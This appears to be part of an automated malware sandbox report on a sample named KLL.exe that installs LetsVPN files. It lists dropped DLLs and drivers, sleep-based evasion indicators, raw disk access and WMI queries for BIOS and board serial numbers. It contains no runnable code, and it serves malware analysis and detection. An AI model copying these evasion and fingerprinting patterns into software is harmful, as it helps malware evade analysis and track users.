Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.NetTcp.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\libwin.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\log4net.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\Update.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Syndication.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.AppContext.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Ports.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Process.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.Calendars.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.ReaderWriter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\System.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Expressions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\microsoft.identitymodel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.MsDelta.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\WindowsInput.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.Odbc.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Cng.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.CompilerServices.Unsafe.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.SystemEvents.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Sockets.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Permissions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.CodeDom.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.InteropServices.RuntimeInformation.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.IPNetwork.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\x64\WebView2Loader.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.SqlClient.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	Dropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\tap0901.sys (copy)	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Memory.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceProcess.ServiceController.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Parallel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Compression.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.IsolatedStorage.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Contracts.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\uninst.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\NuGet.Squirrel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.Common.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebHeaderCollection.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Tracing.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Pkcs.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Timer.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Xml.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.RegularExpressions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Duplex.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.DriveInfo.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.UnmanagedMemoryStream.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.WinForms.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Queryable.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.CompilerServices.VisualC.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XmlSerializer.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.TextWriterTraceListener.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Wpf.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\arm64\WebView2Loader.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Security.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.FileVersionInfo.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.NameResolution.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Packaging.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.ResourceManager.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.OleDb.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Overlapped.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.core.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XPath.XDocument.dll	Jump to dropped file
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\SETC422.tmp	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Pdb.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Json.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNInfraStructure.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Requests.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\ToastNotifications.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.StackTrace.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.SecureString.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SharpCompress.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLite-net.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XmlDocument.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Mdb.dll	Jump to dropped file
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\tap0901.sys (copy)	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.TypeConverter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.NetworkInformation.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Security.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Console.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\FontAwesome.WPF.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\WebSocket4Net.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	Dropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC54B.tmp	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Rocks.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.TraceSource.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Configuration.ConfigurationManager.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.PerformanceCounter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\driver\tap0901.sys	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Squirrel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.Writer.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Http.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.NonGeneric.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Tools.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Numerics.Vectors.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebSockets.Client.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\netstandard.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.provider.dynamic_cdecl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Concurrent.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.EventLog.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.ThreadPool.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Debug.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Principal.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ObjectModel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.ProtectedData.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	Dropped PE file which has not been started: C:\ProgramData\SQBg9\KQ3ts~m8\s	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensionsAsync.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Claims.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Dynamic.Runtime.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Expression.Interactions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Algorithms.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.PatchApi.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	Dropped PE file which has not been started: C:\Windows\System32\drivers\tap0901.sys (copy)	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Web.Services.Description.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\ICSharpCode.AvalonEdit.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.Reader.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Management.Automation.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Windows.Interactivity.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Csp.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Formatters.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\MdXaml.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Core.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.EventBasedAsync.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	Dropped PE file which has not been started: C:\Windows\System32\drivers\SETCB25.tmp	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Xml.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-x64\native\e_sqlite3.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.Annotations.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SuperSocket.Clientuser.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Http.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebSockets.dll	Jump to dropped file

Source: C:\Users\user\Desktop\KLL.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-18681

Source: C:\Windows\System32\svchost.exe TID: 2704	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7376	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe TID: 7992	Thread sleep count: 298 > 30	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe TID: 7992	Thread sleep time: -298000s >= -30000s	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe TID: 7992	Thread sleep count: 9303 > 30	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe TID: 7992	Thread sleep time: -9303000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe TID: 7552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe TID: 7556	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe TID: 8108	Thread sleep time: -31290s >= -30000s
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe TID: 7728	Thread sleep time: -300000s >= -30000s
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe TID: 7556	Thread sleep time: -236147s >= -30000s
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe TID: 6896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe TID: 8024	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select SerialNumber From Win32_BIOS
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
